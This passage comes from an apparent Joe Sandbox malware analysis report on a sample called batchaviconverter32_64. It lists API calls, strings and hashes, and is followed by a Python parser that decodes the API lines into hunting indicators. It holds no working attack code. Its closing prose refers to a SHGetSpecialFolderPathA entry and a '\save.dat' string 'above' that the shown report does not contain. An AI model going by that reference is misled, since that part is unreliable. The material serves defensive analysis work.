                                                                • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                • Part of subcall function 02D888BE: _memmove.LIBCMT ref: 02D888DE
                                                              Strings
                                                              • Month number is out of range 1..12, xrefs: 02D8392C
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                              • String ID: Month number is out of range 1..12
                                                              • API String ID: 3258419250-4198407886
                                                              • Opcode ID: 85e817aa4684be7804780b7adc655b62c099caec3004e427df13cf76f8651021
                                                              • Instruction ID: dc8a896479898f262e96dc87bbc5291080cdb4a5be4c3d10dec82fcfd4286664
                                                              • Opcode Fuzzy Hash: 85e817aa4684be7804780b7adc655b62c099caec3004e427df13cf76f8651021
                                                              • Instruction Fuzzy Hash: 59E0D872E001089FE714BF98D821FDDB775EB08720F50044EE801B3780DAB51D048BE5
                                                              APIs
                                                              • TlsAlloc.KERNEL32 ref: 02D819CC
                                                              • GetLastError.KERNEL32 ref: 02D819D9
                                                                • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocErrorH_prologLast
                                                              • String ID: tss
                                                              • API String ID: 249634027-1638339373
                                                              • Opcode ID: 126c88881554d620f5afd6a9047d41897ae15fbd6e3ffcafe4a7e209f8fa993c
                                                              • Instruction ID: 6702a92085f578eaa8b93832a30d104f9bab30077b00702ffa7f76e3af2b8962
                                                              • Opcode Fuzzy Hash: 126c88881554d620f5afd6a9047d41897ae15fbd6e3ffcafe4a7e209f8fa993c
                                                              • Instruction Fuzzy Hash: F3E04F329042105B87007A78E80949BBBA4DA40231F108B6AECAD833D0EA308D158ADA
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 02D83BD8
                                                              • std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                                • Part of subcall function 02D923E7: std::exception::exception.LIBCMT ref: 02D923F1
                                                                • Part of subcall function 02D8A589: __EH_prolog.LIBCMT ref: 02D8A58E
                                                                • Part of subcall function 02D8A589: __CxxThrowException@8.LIBCMT ref: 02D8A5B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3335185171.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2d81000_batchaviconverter32_64.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                              • String ID: bad cast
                                                              • API String ID: 1300498068-3145022300
                                                              • Opcode ID: b4b119d0b52db7fac34a33c59354123632c2b2eca481010554a0ff27f061d9c8
                                                              • Instruction ID: 6d6f09aa410db0e843c566ef7cde7162f9a9bcdc1752e3e1da81b4607489b6a8
                                                              • Opcode Fuzzy Hash: b4b119d0b52db7fac34a33c59354123632c2b2eca481010554a0ff27f061d9c8
                                                              • Instruction Fuzzy Hash: DEE01A71900108DBC704EF94E555BA9B771EB54311F4080ADE80657790CB359D59CAA5
                                                              APIs
                                                              • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
                                                              • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
                                                              • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
                                                              • HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.3333776436.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000003.00000002.3333776436.0000000000409000.00000040.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_batchaviconverter32_64.jbxd
                                                              Similarity
                                                              • API ID: AllocHeap$FreeVirtual
                                                              • String ID:
                                                              • API String ID: 3499195154-0
                                                              • Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                              • Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
                                                              • Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                              • Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19
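The "APIs" entries above are the parts of this report an analyst actually turns into indicators: the SHGetSpecialFolderPathA call passes CSIDL 0x23 (CSIDL_COMMON_APPDATA, C:\ProgramData on current Windows) and its function carries the string "\save.dat", and the VirtualAlloc call reserves 1 MiB with MEM_RESERVE and PAGE_READWRITE. The following parser is an added example written for this page, not Joe Sandbox code and not part of the sample: it turns lines in the shape of these "APIs" entries into records (function, module, arguments, ref address, calling function for "Part of subcall" lines) and decodes the CSIDL and VirtualAlloc arguments. The sample lines are constructed by copying entries from this page; the CSIDL, MEM_* and PAGE_* tables are deliberately small subsets of the Windows SDK values and are assumptions about which values matter here.

```python
"""Parse Joe Sandbox-style 'APIs' lines into structured records and decode a few arguments.
Added example for this page; not Joe Sandbox code. Input lines below are constructed by
copying entries from the report so the script runs offline."""
import re
from dataclasses import dataclass, field
from typing import Optional

SAMPLE_LINES = """
• _malloc.LIBCMT ref: 02D8535D
  • Part of subcall function 02D92EDC: RtlAllocateHeap.NTDLL(00730000,00000000,00000001), ref: 02D92F1F
• SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D8536F
• TlsAlloc.KERNEL32 ref: 02D819CC
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
• std::runtime_error::runtime_error.LIBCPMT ref: 02D839C1
""".strip("\n").splitlines()

# Function names in these reports contain no '.', so the first '.' separates name from module.
API_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<fn>[^\s(]+?)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    func: str
    module: str
    ref: int
    args: list = field(default_factory=list)  # raw hex strings, or '?' where the report shows unknown
    caller: Optional[int] = None              # set only for "Part of subcall function" lines


def parse_api_lines(lines):
    """Return one ApiCall per line that matches the report's API-entry shape; other lines are skipped."""
    calls = []
    for line in lines:
        m = API_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["fn"], m["mod"], int(m["ref"], 16), args, caller))
    return calls


def arg_int(call, index):
    """Numeric value of argument `index`, or None when missing or shown as '?'."""
    if index >= len(call.args) or call.args[index] == "?":
        return None
    return int(call.args[index], 16)


# Assumed subsets of the SDK constants (enough for the calls on this page).
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
         0x24: "CSIDL_WINDOWS", 0x26: "CSIDL_PROGRAM_FILES"}
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROT = {0x04: "PAGE_READWRITE", 0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def decode(call):
    """Human-readable decoding for the two APIs this example understands; None otherwise."""
    if call.func.startswith("SHGetSpecialFolderPath"):
        csidl = arg_int(call, 2)  # (hwnd, lpszPath, csidl, fCreate)
        if csidl is None:
            return "CSIDL_?"
        return CSIDL.get(csidl, f"CSIDL_0x{csidl:X}")
    if call.func == "VirtualAlloc":  # (lpAddress, dwSize, flAllocationType, flProtect, ...)
        alloc, prot = arg_int(call, 2), arg_int(call, 3)
        names = [n for bit, n in MEM_FLAGS.items() if alloc is not None and alloc & bit]
        prot_name = PAGE_PROT.get(prot, f"0x{prot:X}" if prot is not None else "?")
        return "|".join(names) + ", " + prot_name
    return None


if __name__ == "__main__":
    for c in parse_api_lines(SAMPLE_LINES):
        print(f"{c.ref:08X} {c.func}.{c.module} {c.args} -> {decode(c)}")
```

Joining the decoded CSIDL_COMMON_APPDATA with the "\save.dat" string listed for the same function gives the path a hunt query would look for; the VirtualAlloc decoding shows a reserve-only call, so a later VirtualAlloc or VirtualProtect with an executable protection, not this one, is where an unpacking stage would become visible.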